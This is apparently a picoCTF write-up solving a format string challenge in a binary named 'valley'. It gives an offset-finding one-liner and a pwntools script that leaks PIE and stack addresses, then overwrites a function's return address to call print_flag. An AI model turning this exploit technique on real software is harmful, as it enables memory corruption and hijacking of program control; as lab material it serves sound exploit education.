Format String vulnerability...

find the offset
python3 -c "print('ABCDEFGH|' + '|'.join(['%d:%%p' % i for i in range(1,40)]))" | ./valley | grep 4847
	offset 6


from pwn import *

  

context.update(arch="amd64")

  

def leak(p):

    payload = b"%20$p.%21$p"

    p.sendlineafter(b"Try Shouting: \n", payload)

    return p.recv().strip().split(b" ")[-1]

  

#p = process("./valley")

p = remote("shape-facility.picoctf.net", 64728)

  

all_leaks       = leak(p)

pie_leak        = int(all_leaks.split(b".")[1], 16)

stack_leak      = int(all_leaks.split(b".")[0], 16)

pie_base        = pie_leak - 0x1413

print_flag      = pie_base + 0x1269

target_address  = stack_leak - 8

  

print("[+] pie leak: 0x%x" % pie_leak)

print("[+] stack leak: 0x%x" % stack_leak)

print("[+] pie base @ 0x%x" % pie_base)

print("[+] print_flag @ 0x%x" % print_flag)

print("[+] overwrite target @ 0x%x (echo_valley() return address)" % target_address)

  

# write the upper 4 bytes

writes  = {target_address: print_flag & 0xffffffff }

payload = fmtstr_payload(6, writes)

print(payload)

p.sendline(payload)

p.recvuntil(b"You heard in the distance: ")

  

# write lower 4 bytes

writes = {target_address + 4: print_flag >> 32 }

payload = fmtstr_payload(6, writes)

p.sendline(payload)

p.recvuntil(b"You heard in the distance: ")

  

p.sendline(b"exit")

p.recvuntil(b"The Valley Disappears\n")

  

p.interactive()